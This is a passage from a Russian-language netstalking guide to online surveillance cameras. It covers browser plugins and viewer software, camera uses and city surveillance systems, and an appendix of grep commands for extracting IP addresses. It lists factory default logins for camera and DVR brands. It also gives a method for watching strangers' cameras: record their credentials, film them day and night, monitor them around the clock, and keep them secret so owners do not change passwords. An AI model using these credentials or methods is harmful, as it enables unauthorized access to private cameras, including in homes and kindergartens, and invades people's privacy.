но доступен и ActiveX-интерфейс.

87
Изображение 45 — Canon

Изображение 46 — IQinvision

5.2.2. QuickTime Player


Реализует протокол передачи видео одноимённой технологии от
Apple. Распространён как в интерфейсах непрофессиональных онлайн-
камер, так и в виде альтернативного режима просмотра для камер
AXIS. Для работы необходимы плагины.
Примеры:

∙ NetSurveillance (изобр. 47). Дефолтный доступ: admin без па-


роля;

88
∙ AXIS (изобр. 48). Доступ к просмотру по умолчанию не запа-
ролен.

Изображение 47 — NetSurveillance

Изображение 48 — AXIS с QuickTime

89
5.2.3. ActiveX
В данную категорию входит довольно большое количество самых
разнообразных камер. ActiveX-компоненты предназначены для работы
только в Internet Explorer, но при его отсутствии можно использовать
онлайн-эмуляторы, например, VIRTUAL IE TAB114 .
Для запуска плагина браузер скачивает архив вида *.cab (может
быть локализован по исходному коду страницы) и устанавливает его
содержимое в систему. Следует отметить, что в этом архиве иногда
также находятся программы для просмотра конкретного вида камер,
которые затем можно использовать отдельно от браузера, подключаясь
к любой камере этого вида.
Примеры:

∙ 264 DVR (изобр. 49);

∙ DVR REMOTE VIEWER. Дефолтный доступ: Administrator без


пароля. Из cab-пакета с помощью ActiveX устанавливается кли-
ентская программа, отображающая подробную информацию и
позволяющая настраивать отображение различных каналов, вы-
вод звука (изобр. 50);

∙ DVR WebViewer (изобр. 51);

∙ DVR remote management sytem (TLNetDvr). Дефолтный до-


ступ: admin без пароля, вход с выставленным типом сети «Wan»
(изобр. 52, изобр. 53);

∙ NetDvrV3. Дефолтный доступ: admin без пароля. Интерфейс


клиента интересен возможностями подключения камер по списку
IP и их поиска (изобр. 54, изобр. 55).
114
https://ieonchrome.com/

90
Изображение 49 — 264 DVR

Изображение 50 — Окно программы DVR REMOTE VIEWER

Изображение 51 — DVR WebViewer

91
Изображение 52 — Окно авторизации TLNetDvr

Изображение 53 — Основной интерфейс TLNetDvr

92
Изображение 54 — Окно подключения камеры NetDvrV3

Изображение 55 — Основной интерфейс NetDvrV3

93
5.2.4. Разнообразные плагины
Существует масса других различных плагинов для просмотра и
управления камерами, для которых не нашлось места в данном руко-
водстве. Всегда важно помнить, что плагины устаревают, значит, не на
всех браузерах и не во всех их версиях определённый плагин может
работать.
Ниже приведён список некоторых системных названий плагинов,
не упомянутых в руководстве.

∙ application/x-cmsplugin (CMS Plugin_x86_64);

∙ application/x-dvrwebclient (npwebclient);

∙ application/mozilla-dvrclient-plugin;

∙ application/npguide-plugin;

∙ application/nptest-plugin;

∙ application/nbr/nvrviewer;

∙ application/chwp-webvideo-plugin (npUSSCWebVideoPlugin: rts);

∙ application/hwp-webvideo-plugin (npWebVideoPlugin: rts).

Примеры:

∙ Chipspoint Electronics (TVT). Дефолтный доступ: admin/123456.


Скриншоты : окно авторизации (Internet Explorer, изобр. 56), уве-
домление о том, что плагин (application/x-dvrwebclient) не под-
держивается (Google Chrome, изобр. 57), интерфейс после авто-
ризации (изобр. 59);

∙ Hikvision. Дефолтный доступ: admin/12345. Скриншоты: окно


авторизации (изобр. 60), основной интерфейс (изобр. 61).

94
Изображение 56 — Chipspoint Electronics, окно авторизации

Изображение 57 — Chipspoint Electronics, уведомление о плагине

95
Изображение 58 — Chipspoint Electronics, основной интерфейс

Изображение 59 — Chipspoint Electronics, основной интерфейс

96
Изображение 60 — Hikvision, окно авторизации

Изображение 61 — Hikvision, основной интерфейс

5.3. Софт для просмотра камер


Ниже в таблице приведена информация о программах, предназна-
ченных для подключения к камерам, просмотра и других действий.
Необходимо отметить, что используемая в названиях аббревиатура
"CMS" (Central Management Software) общеиспользуема, и почти у
каждого вендора существует своя версия CMS.

97
Таблица 5 — Софт для просмотра камер
Название Описание
iVMS115 Различный софт, драйвера, утилиты для камер
от Hikvision, русскоязычный портал. Последняя
версия десктопного клиента – 4200, мобильного
клиента – 5600. Работает на различных плат-
формах.
116
iSpy Программа с поддержкой большого количества
разнообразных камер и широкими возможностя-
ми по мониторингу и распознаванию через си-
стему плагинов. Работает только на Windows,
последняя версия – v6.9.0.0.
117
Smart PSS Программа для просмотра NVR и DVR, в част-
ности, камер Dahua. Существуют детальные ин-
струкции118 по использованию при поиске камер.
Работает на Windows и MacOS, последняя вер-
сия – v2.00.
119
CMS Линейка программ корейского производства для
просмотра широкой линейки видеорегистрато-
ров, доступна как на Windows, так и на Linux
(xCMS) и Mac OS (iCMS).
120
IP Cam Viewer Продвинутая программа для видеонаблюдения
и работы с камерами для мобильных телефо-
нов. Поддерживаются аппараты Android, Apple,
Windows, Blackberry, возможен запуск в брау-
зере через Chrome. Подключение возможно к
огромному количеству разнообразных камер, в
том числе и с управлением. Дополнительную ин-
формацию можно взять на форумах: официаль-
ном121 и 4pda122 .
Продолжение на следующей странице

115
http://www.hikvision.msk.ru/index/download/0-14
116
https://www.ispyconnect.com/download.aspx
117
http://www.safemag.ru/smart-pss/
118
https://mega.nz/#!kI8UCJSA!P3KtS7gXQ2kXDvviYyNhC6UYYPNaAV-YT2Ov4FUNG3Q
119
http://www.cctvnpos.com/Support/Download.html
120
https://hit-mob.com/ip-cam-viewer-android/
121
https://hit-mob.com/forums/viewtopic.php?f=7&t=18
122
https://4pda.ru/forum/index.php?showtopic=188353&st=440

98
Таблица 5 – Продолжение
Название Описание
WebView Для просмотра и управления камерами Canon.
Livescope Последняя доступная версия софта от 2004
123
Viewer года124 . Существуют кастомные замены для
устаревших интерфейсов камер Canon (vb-c10-
network-camera-js-client)125 .

5.4. Софт для видеотрансляций


Ниже в таблице приведена информация о программах, использу-
емых для организации видеонаблюдения. В основном, подобные про-
граммы представляют собой серверный софт, и доступ к ним часто
возможен из Сети.

Таблица 6 — Софт для видеотрансляций


Название Описание
AVReg126 Программа для видеорегистрации с возможно-
стью подключения как физических камер, так и
удалённых, через RTSP/HTTP. Распространяет-
ся под лицензией. Пример на изобр. 62.
127
ZoneMinder Популярное открытое128 программное обеспече-
ние для организации видеонаблюдения. Отсут-
ствует для Windows. Есть открытые клиентские
приложения129 под разные платформы. Пример
на изобр. 63
130
IP Webcam Приложение для Android, фактически превраща-
ющая телефон в стриминговый сервер. Доступен
большой выбор форматов вещаний, переключе-
ние основной и фронтальной камер, видеоархив
и так далее. Системы авторизации нет, сервер
легко может быть найден в Сети. Пример на
изобр. 64.
Продолжение на следующей странице
123
http://cweb.canon.jp/drv-upd/webview/viewer-w.html
124
http://pdfstream.manualsonline.com/8/8f1abc81-3686-49dd-928a-eeec74b679ee.pdf
125
https://github.com/davidbrenner/vb-c10-network-camera-js-client
126
http://avreg.net
127
https://zoneminder.com
128
https://github.com/ZoneMinder/ZoneMinder/
129
https://github.com/pliablepixels/zmNinja
130
http://ip-webcam.appspot.com

99
Таблица 6 – Продолжение
Название Описание
MJPG- Общедоступное открытое132 ПО для видеотранс-
Streamer131 ляций. Поддерживает несколько видов стримин-
га. Системы авторизации нет, сервер легко мо-
жет быть найден в Сети. Пример на изобр. 65
133
Xeoma Разнообразное программное обеспечение для
видеонаблюдения. Основная функциональность
обеспечивается десктопными клиентами, но в
Сети могут быть найдены и веб-сервера. Пример
на изобр. 66.
webcamXP, Популярная пара программ для Windows XP
134
webcam7 и 7,8,10 соответственно, поддерживает большое
количество камер и функций. Есть бесплатные
версии. Пример на изобр. 67.
135
SecurOS Коммерческая платформа для организации си-
стем безопасности на основе данных неограни-
ченного числа камер, с возможностью подклю-
чения различных систем аналитики и распозна-
вания.
Devline (Ли- Коммерческое программное обеспечения для ви-
136
ния) деотрансляции и аналитики. Поддерживается
большое количество камер и разнообразные ин-
теграции. Доступ из Сети представлен приложе-
нием на Flash.
137
Avidis Spotter Система видеонаблюдения общего назначения,
созданная на основе специализированной си-
стемы для наблюдения за банкоматами ATM
Defender.

131
https://sourceforge.net/projects/mjpg-streamer/
132
https://github.com/codewithpassion/mjpg-streamer
133
http://felenasoft.com/ru/
134
http://www.webcamxp.com
135
http://isscctv.com/products/securos-enterprise/
136
https://devline.ru/
137
http://avidis.ua/

100
Изображение 62 — Веб-интерфейс Avreg

Изображение 63 — Веб-интерфейс ZoneMinder

101
Изображение 64 — Веб-интерфейс IP Webcam

Изображение 65 — Веб-интерфейс MJPG-Streamer

102
Изображение 66 — Веб-интерфейс Xeoma

Изображение 67 — Веб-интерфейс webcamXP

103
6. Общая информация
6.1. Предназначение
Для чего предназначены онлайн-камеры? Выделим несколько кате-
горий:

∙ наблюдение за общественными местами и учреждениями (пло-


щади, улицы, стоянки; школы, детские сады);

∙ наблюдение за дорожным движением (traffic, speed cameras);

∙ наблюдение на частных объектах (офисы, магазины, торговые


объекты, склады и стройки);

∙ контроль показаний приборов (заводы, лаборатории);

∙ контроль обстановки дома (безопасность, наблюдение за детьми,


животными);

∙ трансляции пейзажей и животных (дикая природа, зоопарки);

∙ рекламные камеры.

Примерную статистику в отношении наблюдаемых частными онлайн-


камерами объектов можно изучить на изобр. 68 – результатах изу-
чения и распознавания миллиона скриншотов инициативной группой
BlackNode138 .
138
https://blog.blacknode.tk/netstalking-webcameras-analysis.html

104
Изображение 68 — Диаграмма распределения распознанных на каме-
рах объектов

В настоящее время, с развитием технологий машинного обучения и


накоплением значительного количества данных, актуальным является
создание комплексных систем видеонаблюдения и аналитики. В Рос-
сии, например, такие муниципальные системы объединены общим на-
званием "Безопасный город", из которых самая известная – городская
система видеонаблюдения Московского ДИТ139 , состоящая из более
чем 160 тысяч камер и предоставляющая возможность для наблюде-
ния ответственным лицам: жильцам, жилищным службам, органам
внутренних дел (см. изобр. 69).
139
http://video.dit.mos.ru/

105
Изображение 69 — Система московского городского видеонаблюдения

Для использования в области безопасности дорожного движения


такие системы создаются отдельно, что вызвано как финансовыми со-
ображениями, так и целесообразностью. Системы ЦАФАП – Центра
автоматизированной фиксации административных правонарушений –
имеются в нескольких вариантах даже в одном регионе (см. примеры
изобр. 70, изобр. 71, изобр. 72, изобр. 73).

Изображение 70 — Спецлаб-Паутина

106
Изображение 71 — Спецлаб-ЦАФАП

Изображение 72 — Авангард

107
Изображение 73 — Поток

Лидером по количеству камер видеонаблюдения считается Лондон,


в котором самое большое количество камер на душу населения – 1 на
каждые 14 человек, всего около 500 тысяч (см. изобр. 74)140 . Ситуация
с видеонаблюдением в городе "Большого брата" (именно там происхо-
дят события антиутопии "1984" Джорджа Оруэлла) часто освещается
в прессе и в различных исследованиях141,142 .
В последнее время всё больше информации появляется об актив-
ном развитии системы видеонаблюдения в Китае: 170 миллионов ра-
ботающих камер по всей стране и 400 миллионов в планах к 2020
году; технологии распознавания номеров, лиц, внешности; отслежива-
ние перемещений лица глубиной в неделю143 . Объединённая система
наблюдения сможет найти любого гражданина за 3 секунды с точно-
стью не менее 88%144 .
Как видно из приведённых выше изображений, системы видеоана-
литики дорожного движения без проблем распознают снятые в разных
ракурсах номера машин. На текущий момент активно развиваются и
технологии распознавания лиц, благодаря которым подобные системы
смогут отслеживать перемещения конкретных людей.
140
https://www.cctv.co.uk/how-many-cctv-cameras-are-there-in-london/
141
http://www.urbaneye.net/results/ue_wp6.pdf
142
http://www.urbaneye.net/results/ue_wp10.pdf
143
https://twitter.com/BBCWorld/status/939832896604565505
144
https://magazeta.com/news/wuzhen-tianyan/

108
Изображение 74 — Уличные камеры наблюдения части Лондона

Разумеется, вопрос беспрерывного наблюдения беспокоит большое


количество людей. Есть проекты, посвященные изучению этических
и правовых вопросов наблюдения145 , а также проекты сопротивления
слежке146 .
Стоит упомянуть и частный сегмент видеонаблюдения, в котором
от камер наблюдения требуется всё больше возможностей. Тенден-
ция к созданию "умных домов" поддерживается крупными компания-
ми, которые разрабатывают системы интеграции, управления голосо-
выми помощниками, и, конечно, видеоконтроля обстановки дома. К
сожалению, в реальности часто подобные системы реализуются непро-
фессионалами с использованием тех же доступных, но небезопасных
устройств, о которых говорится в данном руководстве147,148 .

6.2. Наблюдение за камерами


Как было упомянуто во введении, составление данного руковод-
ства изначально было мотивировано исследованиями онлайн-камер в
сообществах нетсталкеров, занимавшихся поиском и изучением раз-
личных сетевых объектов. По результатам их работ были разработаны
различные программы (см. раздел Клиентский софт) и инструкции,
зафиксированы интересные факты и истории (см. Ознакомительное
руководство по нетсталкингу149 ), сформированы правила наблюдения
за онлайн-камерами, базирующиеся на политике невмешательства:

∙ не меняйте пароли к устройствам;


145
http://www.urbaneye.net
146
https://eyes.daylightingsociety.org
147
http://farwit.com/about.html
148
https://geektimes.ru/post/284048/
149
https://chaos.cyberpunk.us/upload/29/Oznakomitelnoe_rukovodstvo_po_netstalkingu.pdf

109
∙ не переименовывайте камеры и не меняйте настройки;

∙ не вращайте камеры (по меньшей мере, в присутствии владель-


ца);

∙ не устраивайте пранки (некоторые камеры имеют динамик и мо-


гут транслировать звук от наблюдателя).

Также следует напомнить, что большинство дешёвых потребитель-


ских моделей камер не обладают достаточной мощностью для одно-
временного стриминга видео большому количеству пользователей од-
новременно. В общем случае, если необходимо организовать общий
доступ, необходимо некое программное решение, "прокси-сервер кэши-
рующий видеопоток онлайн-камеры и отдающий его остальным поль-
зотелям с сервера, обладающего достаточной мощностью. Пример по-
добного облачного сервиса – RTSP.ME150 .
Далее приведём методические рекомендации по изучению камер из
нетсталкерского сообщества151 .
Иногда нетсталкеры в панике или в суматохе не успевают собрать
достаточно сведений для анализа, а на следующий день объект ис-
чезает. Люди не верят в неподкреплённое фактами. Так происходит
с системами видеонаблюдения, живущими не дольше 3-х дней: они,
как и большинство сетевых устройств, имеют реальные (не серые)
динамические IP-адреса и после перезагрузки переезжают. При жела-
нии владелец может купить статический адрес у провайдера или на
сервисах типа DynDNS, но эти случаи единичны. Поэтому, описывая
находки в протоколе, вы должны быть последовательны и собраны.
Чтобы не упустить важных деталей, можете следовать предложенным
рекомендациям.
Как только вы наткнётесь на интересную трансляцию или рассказы
о ней, не оттягивайте и запишите зацепки, которые помогут её опо-
знать. Зафиксируйте, где именно нашлась ссылка, будь это тема на
форуме, выдача поисковика или общение в чате: часто это забывает-
ся, а переписка и журнал браузера могут быть очищены. Определяя
первоисточник, сортируйте и выносите даты в контексте, ищите более
ранние упоминания. Сохранять адрес удобно стандартом IPv4 или до-
меном. Камеры с нескольких портов перечисляте слэшем с пробелом
(8080 / 80 / 8888). Можете добавить более 1-ой ссылки, если они
относятся к подсети и устройства расположены в одной местности.
Полезно указание адреса видеотрансляции (/mjpg/video.mjpg) или па-
150
https://rtsp.me
151
По материалам https://vk.com/netover

110
нели управления (view/index.shtml). Обязательно зафиксируйте логин
и пароль.
Бывает, человек утверждает, что услышал на просмотре голос, а
потом выясняется: аппарат был без микрофона. Избегая заблуждений,
изучите подробности о "железе" и соотнесите функционал модели с
показаниями. Сперва укажите вендора, т.е. производящую и распро-
страняющую продукцию компанию: AXIS, Panasonic, MOBOTIX и т.п,
а затем ID серии: WVC54G, SNC-RZ25, TV-IP201. Эти сведения на-
ходятся на странице просмотра или строке состояния, куда выводится
время: зачастую ошибочое, так как не всякий владелец синхронизиру-
ет NTP-серверы. В последний черёд перечислите функции: поддерж-
ку Audio I/O, PTZ, Presets (предустановленные значения параметров
PTZ), Stream, Backup, Sensors (датчики движения, звука и тепла).
Сориентировавшись, соберите материалы: по 2 снимка ночью и
днём, пятиминутный образец видео и, в случае поддержки, звука.
Определите страну и город по Whois, узнайте часовой пояс и разметьте
по нему лучшее время для документирования. Организуйте круглосу-
точное наблюдение, если камера того стоит или вызывает вопросы.
Убирая её в долгий ящик, прикрепите дату последней проверки, так
как статус трансляций меняется. Они могут быть:

∙ активны (доступны для просмотра в том же виде);


∙ неактивны (отключены, защищены или сбоят; причину лучше
уточнить);
∙ заменены (технически работают, но точка установки отлична от
прошлой).

Старайтесь не разглашать адрес и доступ к камере в публичных


местах (чатах, открытых сетевых площадках), так как несведущий
сменит пароль, и вы лишитесь находки.

6.3. Изучение записей


Часто в онлайн-камерах встречается функциональность по хране-
нию архива записей, что полезно для изучения контента трансляции. К
сожалению, сейчас не существует эффективных автоматических реше-
ний для поиска по видео, из-за чего много времени может уйти просто
лишь на проматывание отрезков и ручной просмотр.
Исправить это возможно с помощью табличного воспроизведения
видео, при котором видеоряд разбивается на некоторое количество от-
резков, одновременно проигрываемых на одном экране. Это удобно при

111
статичной картинке, так как позволяет быстро найти даже небольшие
отличия в одном из отрезков; также такой подход позволяет быстро
найти резко отличающиеся по освещённости кадры.
Примеры программ, предлагающих подобное решение:

∙ Video Index Lite152 ;

∙ Fast Video Cataloger153 .

Изображение 75 — Табличное воспроизведение видео

152
http://www.aapsoftware.ru/product.php?id=36
153
http://videocataloger.com/

112
7. Послесловие
Данный документ является попыткой систематизировать доступные
в Сети сведения об онлайн-камерах и доступу к ним.
Прислать авторам материалы, комментарии, исправления и пожела-
ния по доработке можно на коллективный ящик электронной почты.

113
Приложение А
Обработка текстовых данных
1. Извлечь из текстового документа все вхождения строк формата
IP ("число.число.число.число"):
grep -Po "\d+\.\d+\.\d+\.\d+" results.txt > ip.txt
Используется консольная утилита grep с флагом -P для регуляр-
ных выражений типа Perl и флагом -o для вывода только совпадаю-
щей подстроки. Таким образом, из каждой строки файла results.txt
будут извлечены IP-адреса и записаны построчно в файл ip.txt .
2. Извлечь из текстового документа все вхождения строк формата
IP:Port ("число.число.число.число:число"):
grep -Po "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}" \
results.txt > ip_port.txt
Аналогично 1, используется grep , при этом дополнительно идёт
сравнение по подстроке из двоеточия и числа. В отличие от преды-
дущего примера, здесь уточнено, что число октета IP-адреса может
иметь от 1 до 3 цифр, а порт может иметь от 1 до 5 цифр. Таким обра-
зом, из каждой строки файла results.txt будут извлечены IP-адреса
с портами и записаны построчно в файл ip_port.txt .
3. Извлечь из текстового документа все правильные IP, после ко-
торых могут быть указаны порты в формате IP:Port:
grep -Eo "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\
\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\
\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\
\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\
(:(6553[0-5]|655[0-2][0-9]|65[0-4][0-9]{2}|\
6[0-4][0-9]{3}|[1-5][0-9]{4}|[0-9]{1,4}))?" results.txt >
ip_port.txt
В отличие от 1 и 2, здесь используется упрощенный синтаксис ре-
гулярных выражений указанием флага -E , при этом каждый октет
IP-адреса рассматривается как один из точных вариантов сочетаний
цифр. Порт при этом помечен как группа, которая может отсутство-
вать, и не проверяется на корректную длину.
4. Регулярные выражения можно составлять и использовать как в
продвинутых текстовых редакторах (Notepad++, Sublime Text), так и
онлайн-инструментах:

∙ https://regex101.com

114
∙ https://regexr.com

∙ https://www.regextester.com

∙ https://pythex.org

∙ http://www.phpliveregex.com

Кроме того, существуют и другие онлайн-инструменты, предостав-


ляющих различных спектр возможностей:

∙ http://www.toolsvoid.com/extract-ip-addresses – извлечение спис-


ка корректных IP

∙ https://pengi.me/parser/parse.html – извлечение IP и банковских


номеров c возможностью фильтрации по черному списку

∙ https://gchq.github.io/CyberChef – извлечение IPv4, IPv6, диапа-


зонов (см. поиск в Operations по IP)

115